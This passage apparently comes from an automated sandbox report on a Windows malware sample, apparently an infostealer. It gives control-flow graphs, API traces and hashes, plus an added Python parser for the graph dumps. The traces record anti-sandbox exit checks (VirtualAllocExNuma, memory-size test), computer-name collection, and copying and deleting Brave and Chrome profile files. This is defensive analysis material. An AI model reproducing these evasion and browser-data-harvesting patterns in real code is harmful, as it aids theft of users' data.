                          • Instruction ID: 2261fbaec850444422d8cdb585bcaf1187a80326a76fc0e0b57706273d46f1d3
                          • Opcode Fuzzy Hash: 61c0ee92fd861e44cbfe8b0695845a4143510a1a45c3dfa18194a885ded27da8
                          • Instruction Fuzzy Hash: D6012D71D00218ABEB54DFA8EC49B9EBBB8EB59364F008126F914E7390EB7459048FD5

                           Control-flow Graph
                           • Basic blocks of the function at 511030, sorted by address: node id, address range, calls made in the block -> successor node ids; "(exit)" marks a block with no successor in the graph
                           • 2798 511030-511055 GetCurrentProcess VirtualAllocExNuma -> 2799, 2800
                           • 2799 511057-511058 ExitProcess -> (exit)
                           • 2800 51105e-51107b VirtualAlloc -> 2801, 2802
                           • 2802 51107d-511080 -> 2801
                           • 2801 511082-511088 -> 2803, 2804
                           • 2804 51108a-5110ab VirtualFree -> 2803
                           • 2803 5110b1-5110b6 -> (exit)
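                           Joe Sandbox serialises each graph image as a flat token stream: a decimal node id, a hex address range, the calls in that block, and `src->dst` edges. The following is an added example (not Joe Sandbox code and not code from the sample) that parses that stream into an adjacency list and answers the triage question this particular function raises: which block's branch decides whether ExitProcess is reached. The input is the dump for the function at 511030 above, copied verbatim; the node-start heuristic (a decimal token immediately followed by an address-shaped token) is my own and is what keeps an all-digit call target such as `call 512930` from being mistaken for a node id.

```python
"""Parse a Joe Sandbox 'control_flow_graph' dump into an adjacency list and
ask which block gates ExitProcess. Added example; not Joe Sandbox code.
CFG_DUMP is copied from the function at 511030 in the report."""
import re
from collections import defaultdict

CFG_DUMP = ("control_flow_graph 2798 511030-511055 GetCurrentProcess VirtualAllocExNuma "
            "2799 511057-511058 ExitProcess 2798->2799 2800 51105e-51107b VirtualAlloc "
            "2798->2800 2801 511082-511088 2802 51107d-511080 2800->2801 2800->2802 "
            "2803 5110b1-5110b6 2804 51108a-5110ab VirtualFree 2801->2803 2801->2804 "
            "2802->2801 2804->2803")

EDGE = re.compile(r"^(\d+)->(\d+)$")
ADDR = re.compile(r"^[0-9a-f]{5,8}(?:-[0-9a-f]{5,8})?$")  # '516c99' or '516c40-516c64'


def parse_cfg(dump):
    """nodes: id -> (start, end, [annotations]); succ: id -> [successor ids].
    A node starts at a decimal token followed by an address token; every token
    up to the next node or edge is an annotation ('call', '512930', 'lstrcpy', '*', '2').
    The lookahead is what stops the all-digit call target 512930 from being read
    as a node id: the token after it is never an address."""
    tokens = dump.split()
    if tokens[:1] == ["control_flow_graph"]:
        tokens = tokens[1:]
    nodes, succ, current, i = {}, defaultdict(list), None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE.match(tok)
        if edge:
            succ[int(edge.group(1))].append(int(edge.group(2)))
            current, i = None, i + 1
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR.match(tokens[i + 1]):
            lo, _, hi = tokens[i + 1].partition("-")
            current = int(tok)
            nodes[current] = (int(lo, 16), int(hi or lo, 16), [])
            i += 2
        elif current is None:
            raise ValueError(f"unexpected token {tok!r} at position {i}")
        else:
            nodes[current][2].append(tok)
            i += 1
    return nodes, dict(succ)


def predecessors(succ):
    pred = defaultdict(list)
    for src, dsts in succ.items():
        for dst in dsts:
            pred[dst].append(src)
    return dict(pred)


def blocks_calling(nodes, api):
    return sorted(nid for nid, (_, _, ann) in nodes.items() if api in ann)


def exit_blocks(nodes, succ):
    """Blocks with no successor: function returns and process exits."""
    return sorted(nid for nid in nodes if not succ.get(nid))


def gates_of(nodes, succ, api):
    """Conditional blocks (more than one successor) that branch straight into a
    block calling api. For the dump above that is the VirtualAllocExNuma block,
    so the outcome of that allocation is what decides between exit and continue."""
    pred = predecessors(succ)
    return sorted({p for target in blocks_calling(nodes, api)
                   for p in pred.get(target, []) if len(succ.get(p, [])) > 1})


def render(nodes, succ):
    """One line per block, sorted by address: 'id start-end calls -> successors'."""
    lines = []
    for nid, (lo, hi, ann) in sorted(nodes.items(), key=lambda kv: kv[1][0]):
        rng = f"{lo:x}" if lo == hi else f"{lo:x}-{hi:x}"
        out = ", ".join(map(str, succ.get(nid, []))) or "(exit)"
        lines.append(" ".join([str(nid), rng, *ann]) + " -> " + out)
    return lines
```

The parser tolerates the `* N` repeat markers and `call <addr>` annotations used in the larger dumps on this page, but it assumes the dump is well formed: an annotation token that appears after an edge and before the next node raises rather than being attached to a guessed block, which is preferable to silently mis-assigning a call when triaging an unfamiliar report.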
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00511046
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 0051104D
                          • ExitProcess.KERNEL32 ref: 00511058
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0051106C
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 005110AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                          • String ID:
                          • API String ID: 3477276466-0
                          • Opcode ID: 457b1549a889e9480de0a067cee71de1c82c346551dc7bfb46d48cbb4ffe1367
                          • Instruction ID: f453e10ce53eed307bbeac6e5c4a1d35f1753c379551def5fbac9dfd552fa7df
                          • Opcode Fuzzy Hash: 457b1549a889e9480de0a067cee71de1c82c346551dc7bfb46d48cbb4ffe1367
                          • Instruction Fuzzy Hash: 4A01F479B40204BBF7205A656C5EFAB7BADA786B11F30C015F704E72D0DAB5ED00866C

                          Control-flow Graph (basic blocks and edges; node colouring for Executed / Not Executed is not recoverable from the text)
                          control_flow_graph 2805 52ee90-52eeb5 call 512930 2808 52eeb7-52eebf 2805->2808 2809 52eec9-52eecd call 516c40 2805->2809 2808->2809 2810 52eec1-52eec3 lstrcpy 2808->2810 2812 52eed2-52eee8 StrCmpCA 2809->2812 2810->2809 2813 52ef11-52ef18 call 512a20 2812->2813 2814 52eeea-52ef02 call 512a20 call 512930 2812->2814 2820 52ef20-52ef28 2813->2820 2823 52ef04-52ef0c 2814->2823 2824 52ef45-52efa0 call 512a20 * 10 2814->2824 2820->2820 2822 52ef2a-52ef37 call 512930 2820->2822 2822->2824 2831 52ef39 2822->2831 2823->2824 2827 52ef0e-52ef0f 2823->2827 2830 52ef3e-52ef3f lstrcpy 2827->2830 2830->2824 2831->2830
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052EEC3
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0052EEDE
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 0052EF3F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID: ERROR
                          • API String ID: 3722407311-2861137601
                          • Opcode ID: 896ce42164c3be52c1666dc9245c86502082ec63ee9bb1deb8d0c54d6e9bae87
                          • Instruction ID: 2c8b5ba8cf3e771418e8cc470cd8ccac4445b91c03b92f1316577cad84da28cb
                          • Opcode Fuzzy Hash: 896ce42164c3be52c1666dc9245c86502082ec63ee9bb1deb8d0c54d6e9bae87
                          • Instruction Fuzzy Hash: B02121306602579BDB21FF79ED4AADA3FA5BF51300F005424B84ADB252DB70DCA08B90

                          Control-flow Graph (basic blocks and edges; node colouring for Executed / Not Executed is not recoverable from the text)
                          control_flow_graph 2886 5110c0-5110cb 2887 5110d0-5110dc 2886->2887 2889 5110de-5110f3 GlobalMemoryStatusEx 2887->2889 2890 511112-511114 ExitProcess 2889->2890 2891 5110f5-511106 2889->2891 2892 511108 2891->2892 2893 51111a-51111d 2891->2893 2892->2890 2894 51110a-511110 2892->2894 2894->2890 2894->2893
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 803317263-2766056989
                          • Opcode ID: c6b0fbf1bbfef6b8989309af2475b7fcbcd326b7f46fb1922365f4ccc05deeae
                          • Instruction ID: c61a60b01cb856dd6ada60cb5e7d1316731a14b2e3b7b947359ac27a811a1fea
                          • Opcode Fuzzy Hash: c6b0fbf1bbfef6b8989309af2475b7fcbcd326b7f46fb1922365f4ccc05deeae
                          • Instruction Fuzzy Hash: E7F02E7450464557FB10AA74D80A39EFFD8F705390F104969DF9AC2191E330C8C0C12F

                          Control-flow Graph (basic blocks and edges; node colouring for Executed / Not Executed is not recoverable from the text)
                          control_flow_graph 2895 528c88-528cc4 StrCmpCA 2898 528cc6-528cc7 ExitProcess 2895->2898 2899 528ccd-528ce6 2895->2899 2901 528ee2-528eef call 512a20 2899->2901 2902 528cec-528cf1 2899->2902 2903 528cf6-528cf9 2902->2903 2905 528ec3-528edc 2903->2905 2906 528cff 2903->2906 2905->2901 2946 528cf3 2905->2946 2908 528d30-528d3f lstrlen 2906->2908 2909 528e56-528e64 StrCmpCA 2906->2909 2910 528d5a-528d69 lstrlen 2906->2910 2911 528dbd-528dcb StrCmpCA 2906->2911 2912 528ddd-528deb StrCmpCA 2906->2912 2913 528dfd-528e0b StrCmpCA 2906->2913 2914 528e1d-528e2b StrCmpCA 2906->2914 2915 528e3d-528e4b StrCmpCA 2906->2915 2916 528d06-528d15 lstrlen 2906->2916 2917 528d84-528d92 StrCmpCA 2906->2917 2918 528da4-528db8 StrCmpCA 2906->2918 2919 528e88-528e9a lstrlen 2906->2919 2920 528e6f-528e7d StrCmpCA 2906->2920 2931 528d41-528d46 call 512a20 2908->2931 2932 528d49-528d55 call 512930 2908->2932 2909->2905 2927 528e66-528e6d 2909->2927 2933 528d73-528d7f call 512930 2910->2933 2934 528d6b-528d70 call 512a20 2910->2934 2911->2905 2937 528dd1-528dd8 2911->2937 2912->2905 2921 528df1-528df8 2912->2921 2913->2905 2922 528e11-528e18 2913->2922 2914->2905 2923 528e31-528e38 2914->2923 2915->2905 2924 528e4d-528e54 2915->2924 2925 528d17-528d1c call 512a20 2916->2925 2926 528d1f-528d2b call 512930 2916->2926 2917->2905 2936 528d98-528d9f 2917->2936 2918->2905 2929 528ea4-528eb0 call 512930 2919->2929 2930 528e9c-528ea1 call 512a20 2919->2930 2920->2905 2928 528e7f-528e86 2920->2928 2921->2905 2922->2905 2923->2905 2924->2905 2925->2926 2955 528eb3-528eb5 2926->2955 2927->2905 2928->2905 2929->2955 2930->2929 2931->2932 2932->2955 2933->2955 2934->2933 2936->2905 2937->2905 2946->2903 2955->2905 2956 528eb7-528eb9 2955->2956 2956->2905 2957 528ebb-528ebd lstrcpy 2956->2957 2957->2905
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 4a5b45acc7e4086dbd37e69497cd50bce968396abbc29ccd48c4b9a6dff71e98
                          • Instruction ID: 13e9f5c55128b42a54918b2a8b797b2bc4b3f7e1b34ff84a341bb135d9f01117
                          • Opcode Fuzzy Hash: 4a5b45acc7e4086dbd37e69497cd50bce968396abbc29ccd48c4b9a6dff71e98
                          • Instruction Fuzzy Hash: 1FE09264200256EBD7049BB9DC45D97FB6CBF85700704C229A5045B162DB34EC41C7D8

                          Control-flow Graph (basic blocks and edges; node colouring for Executed / Not Executed is not recoverable from the text)
                          control_flow_graph 2958 532ad0-532b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2959 532b44-532b59 2958->2959 2960 532b24-532b36 2958->2960
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00532AFF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00532B06
                          • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00532B1A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: a90630f63474da38d2dd078be5f19f49a3909f678e02cf5f3dd3e38ab6130293
                          • Instruction ID: 4441bfe979a41aef234b1c318967348ef43ea0f1776ee29ffd182c1c1d29829a
                          • Opcode Fuzzy Hash: a90630f63474da38d2dd078be5f19f49a3909f678e02cf5f3dd3e38ab6130293
                          • Instruction Fuzzy Hash: BC01D676A44608ABC710CF99EC45BAEFBB8F745B21F00426BFA15D3790D778590087A1
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005223D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005223F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00522402
                          • lstrlen.KERNEL32(\*.*), ref: 0052240D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052242A
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 00522436
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052246A
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00522486
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: \*.*
                          • API String ID: 2567437900-1173974218
                          • Opcode ID: fe5929698f3bba94fd98c52703abdfe391908b12435ab12ff6f8612fa97c8710
                          • Instruction ID: 98055ac241819d007cdf4b6e0f1b4d18e928a14d107e14f151f985eeb6992c29
                          • Opcode Fuzzy Hash: fe5929698f3bba94fd98c52703abdfe391908b12435ab12ff6f8612fa97c8710
                          • Instruction Fuzzy Hash: DDA2A53591162BABDB21AF74DC4CAAF7FB9BF46700F048025B905E7251DB38DD818B54
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005116E2
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00511719
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051176C
                          • lstrcat.KERNEL32(00000000), ref: 00511776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005117A2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005117EF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005117F9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511825
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511875
                          • lstrcat.KERNEL32(00000000), ref: 0051187F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005118AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 005118F3
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005118FE
                          • lstrlen.KERNEL32(00541794), ref: 00511909
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511929
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00511935
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051195B
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00511966
                          • lstrlen.KERNEL32(\*.*), ref: 00511971
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051198E
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 0051199A
                            • Part of subcall function 00534040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0053406D
                            • Part of subcall function 00534040: lstrcpy.KERNEL32(00000000,?), ref: 005340A2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005119C3
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511A0E
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00511A16
                          • lstrlen.KERNEL32(00541794), ref: 00511A21
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511A41
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00511A4D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511A76
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00511A81
                          • lstrlen.KERNEL32(00541794), ref: 00511A8C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511AAC
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00511AB8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511ADE
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00511AE9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511B11
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00511B45
                          • StrCmpCA.SHLWAPI(?,005417A0), ref: 00511B70
                          • StrCmpCA.SHLWAPI(?,005417A4), ref: 00511B8A
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00511BC4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511BFB
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00511C03
                          • lstrlen.KERNEL32(00541794), ref: 00511C0E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511C31
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00511C3D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511C69
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00511C74
                          • lstrlen.KERNEL32(00541794), ref: 00511C7F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511CA2
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00511CAE
                          • lstrlen.KERNEL32(?), ref: 00511CBB
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511CDB
                          • lstrcat.KERNEL32(00000000,?), ref: 00511CE9
                          • lstrlen.KERNEL32(00541794), ref: 00511CF4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511D14
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00511D20
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511D46
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00511D51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511D7D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511DE0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00511DEB
                          • lstrlen.KERNEL32(00541794), ref: 00511DF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511E19
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00511E25
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511E4B
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00511E56
                          • lstrlen.KERNEL32(00541794), ref: 00511E61
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511E81
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00511E8D
                          • lstrlen.KERNEL32(?), ref: 00511E9A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511EBA
                          • lstrcat.KERNEL32(00000000,?), ref: 00511EC8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511EF4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511F3E
                          • GetFileAttributesA.KERNEL32(00000000), ref: 00511F45
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00511F9F
                          • lstrlen.KERNEL32(011A8A20), ref: 00511FAE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511FDB
                          • lstrcat.KERNEL32(00000000,?), ref: 00511FE3
                          • lstrlen.KERNEL32(00541794), ref: 00511FEE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051200E
                          • lstrcat.KERNEL32(00000000,00541794), ref: 0051201A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00512042
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051204D
                          • lstrlen.KERNEL32(00541794), ref: 00512058
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00512075
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00512081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                          • String ID: \*.*
                          • API String ID: 4127656590-1173974218
                          • Opcode ID: b4ce9d0dfe56e4d4f6cd707211fe49a757b332bc42388a2dea79762bb5275e21
                          • Instruction ID: a1c277aed5855723a5de6952e02a58f66c0c1d365d8d324b9d91f3b16892ffeb
                          • Opcode Fuzzy Hash: b4ce9d0dfe56e4d4f6cd707211fe49a757b332bc42388a2dea79762bb5275e21
                          • Instruction Fuzzy Hash: 24929B3591161B9BEB21AFA4DC88AEF7FB9BF81700F044165FA05A7211DB349DC1CBA4
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051DBC1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DBE4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051DBEF
                          • lstrlen.KERNEL32(00544CA8), ref: 0051DBFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DC17
                          • lstrcat.KERNEL32(00000000,00544CA8), ref: 0051DC23
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DC4C
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051DC8F
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051DCBF
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0051DCD0
                          • StrCmpCA.SHLWAPI(?,005417A0), ref: 0051DCF0
                          • StrCmpCA.SHLWAPI(?,005417A4), ref: 0051DD0A
                          • lstrlen.KERNEL32(0053CFEC), ref: 0051DD1D
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051DD47
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DD70
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051DD7B
                          • lstrlen.KERNEL32(00541794), ref: 0051DD86
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DDA3
                          • lstrcat.KERNEL32(00000000,00541794), ref: 0051DDAF
                          • lstrlen.KERNEL32(?), ref: 0051DDBC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DDDF
                          • lstrcat.KERNEL32(00000000,?), ref: 0051DDED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DE19
                          • lstrlen.KERNEL32(00541794), ref: 0051DE3D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051DE6F
                          • lstrcat.KERNEL32(00000000,00541794), ref: 0051DE7B
                          • lstrlen.KERNEL32(011A8840), ref: 0051DE8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DEB0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051DEBB
                          • lstrlen.KERNEL32(00541794), ref: 0051DEC6
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051DEE6
                          • lstrcat.KERNEL32(00000000,00541794), ref: 0051DEF2
                          • lstrlen.KERNEL32(011A8A80), ref: 0051DF01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DF27
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051DF32
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DF5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DFA5
                          • lstrcat.KERNEL32(00000000,00541794), ref: 0051DFB1
                          • lstrlen.KERNEL32(011A8840), ref: 0051DFC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DFE9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051DFF4
                          • lstrlen.KERNEL32(00541794), ref: 0051DFFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E022
                          • lstrcat.KERNEL32(00000000,00541794), ref: 0051E02E
                          • lstrlen.KERNEL32(011A8A80), ref: 0051E03D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E063
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051E06E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E09A
                          • StrCmpCA.SHLWAPI(?,Brave), ref: 0051E0CD
                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 0051E0E7
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051E11F
                          • lstrlen.KERNEL32(011ACF20), ref: 0051E12E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E155
                          • lstrcat.KERNEL32(00000000,?), ref: 0051E15D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E19F
                          • lstrcat.KERNEL32(00000000), ref: 0051E1A9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E1D0
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0051E1F9
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051E22F
                          • lstrlen.KERNEL32(011A8A20), ref: 0051E23D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E261
                          • lstrcat.KERNEL32(00000000,011A8A20), ref: 0051E269
                          • lstrlen.KERNEL32(\Brave\Preferences), ref: 0051E274
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E29B
                          • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 0051E2A7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E2CF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E30F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E349
                          • DeleteFileA.KERNEL32(?), ref: 0051E381
                          • StrCmpCA.SHLWAPI(?,011AD0A0), ref: 0051E3AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E3F4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E41C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E445
                          • StrCmpCA.SHLWAPI(?,011A8A80), ref: 0051E468
                          • StrCmpCA.SHLWAPI(?,011A8840), ref: 0051E47D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E4D9
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0051E4E0
                          • StrCmpCA.SHLWAPI(?,011AD0D0), ref: 0051E58E
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051E5C4
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0051E639
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E678
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E6A1
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E6C7
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E70E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E737
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E75C
                          • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0051E776
                          • DeleteFileA.KERNEL32(?), ref: 0051E7D2
                          • StrCmpCA.SHLWAPI(?,011A8A30), ref: 0051E7FC
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E88C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E8B5
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E8EE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E916
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E952
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
